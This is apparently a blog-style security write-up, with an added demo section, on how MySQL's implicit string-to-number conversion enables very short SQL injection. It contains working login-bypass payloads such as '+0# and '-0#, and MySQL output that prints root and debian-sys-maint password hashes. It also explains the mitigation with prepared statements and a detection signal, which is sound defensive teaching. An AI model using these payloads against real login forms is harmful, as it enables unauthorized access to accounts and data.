Abusing MySQL string arithmetic for tiny SQL injections

Test platform:    backtrack r3x86
MySQL version:    mysql-5.1.63


mysql> select User,Password from user where User=0;
+------------------+-------------------------------------------+
| User             | Password                                  |
+------------------+-------------------------------------------+
| root             | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root             | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| root             | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 |
| debian-sys-maint | *8C4C424D182238AFBA8B217F692D07C952EF4087 |
+------------------+-------------------------------------------+
4 rows in set, 4 warnings (0.00 sec)

mysql> select User,Password from user where User='';
Empty set (0.00 sec)

mysql> select User,Password from user where User=NULL;
Empty set (0.01 sec)

mysql> select 'w'-'w';
+---------+
| 'w'-'w' |
+---------+
|       0 |
+---------+
1 row in set, 2 warnings (0.00 sec)

mysql> select "w"-"w";
+---------+
| "w"-"w" |
+---------+
|       0 |
+---------+
1 row in set, 2 warnings (0.01 sec)

Some readers may not believe the warnings above on their own, so here is a verification: the result of string arithmetic is materialised into a table and its column type inspected.


mysql> create TEMPORARY TABLE temptbl AS SELECT ('A'-'A') AS coll;
Query OK, 1 row affected, 2 warnings (0.01 sec)
Records: 1  Duplicates: 0  Warnings: 0

mysql> describe temptbl;
+-------+--------+------+-----+---------+-------+
| Field | Type   | Null | Key | Default | Extra |
+-------+--------+------+-----+---------+-------+
| coll  | double | NO   |     | 0       |       |
+-------+--------+------+-----+---------+-------+
1 row in set (0.01 sec)

Any expression that forces a numeric type conversion works. Once the right-hand side is a number, MySQL converts the string column to a number for the comparison, and a string that does not start with a digit converts to 0 (this is why `User=0` at the top matched every row). For example: select username,password from users where username= '' +0;

Variants such as '+0, '-0, '*0 and '^0 all work in the same way. A trimmed payload can bypass login authentication: '+0#, '/1#, '^0, '-0# and so on.
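The following MySQL session is an added example and is not part of the original post or of the linked articles. It uses a constructed temporary table named `users` with placeholder password hashes, shows why the `'' + 0` comparison matches every username that does not begin with a digit, and then runs the same attacker input through a server-side prepared statement with a bound parameter (`PREPARE ... USING`) so the value stays a string and is never coerced to a number.

```sql
-- Added example (not from the original post). Constructed demo table;
-- the hashes are placeholders, not real MySQL password hashes.
CREATE TEMPORARY TABLE users (
  username VARCHAR(32) NOT NULL,
  password CHAR(41)    NOT NULL
);
INSERT INTO users VALUES
  ('root',  '*PLACEHOLDER_HASH_1'),
  ('alice', '*PLACEHOLDER_HASH_2'),
  ('42bob', '*PLACEHOLDER_HASH_3');   -- leading digits convert to 42, not 0

-- Vulnerable pattern: the application pastes the submitted username into the
-- query text. With input  '+0#  the WHERE clause becomes  username = '' + 0
-- (everything after # is a comment, so the password check disappears).
-- '' + 0 is numeric 0, so each username is converted to DOUBLE before comparing:
-- 'root' -> 0, 'alice' -> 0, '42bob' -> 42. Two rows match without a password.
SELECT username FROM users WHERE username = '' + 0;
-- Expected: root, alice  (with "Truncated incorrect DOUBLE value" warnings)
SHOW WARNINGS;

-- Mitigation: bind the input as a parameter. The same text  '+0#  is now a
-- string value, the comparison is string-vs-string, and nothing is coerced.
SET @u := '''+0#';    -- the literal text  '+0#  ('' escapes one quote)
PREPARE login FROM 'SELECT username FROM users WHERE username = ?';
EXECUTE login USING @u;     -- Expected: Empty set
DEALLOCATE PREPARE login;

DROP TEMPORARY TABLE users;
```

The bypass only works because the comparison type is decided at query-parse time from the query text; a bound parameter is typed by its value, so the column keeps its string comparison. The 1292 "Truncated incorrect DOUBLE value" warnings that MySQL raises for every coerced row are also a useful signal: a login query that suddenly produces one warning per user row is worth alerting on.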




http://www.xaprb.com/blog/2008/08/13/how-to-emulate-the-typeof-function-in-mysql/
http://blog.kotowicz.net/2013/01/abusing-mysql-string-arithmetic-for.html
http://www.freebuf.com/articles/web/6894.html
